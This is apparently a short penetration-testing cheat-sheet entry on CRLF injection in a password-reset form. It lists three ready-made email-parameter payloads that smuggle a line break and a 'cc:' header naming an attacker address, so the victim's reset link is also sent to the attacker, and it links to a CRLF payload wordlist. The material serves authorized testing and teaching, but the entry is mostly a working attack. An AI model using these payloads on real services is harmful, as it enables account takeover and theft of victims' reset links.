CRLF injection to add email CC

Insert a line break and a cc: address into the password reset request's email parameter to steal the reset link:

email="victim-user@syslifters.com%0a%0dcc:attacker-user@syslifters.com"

email="victim-user@syslifters.com%0Acc:attacker-user@syslifters.com"

email="victim-user@syslifters.com%0A%20cc:attacker-user@syslifters.com"

CRLF wordlist:

https://github.com/cujanovic/CRLF-Injection-Payloads/blob/master/CRLF-payloads.txt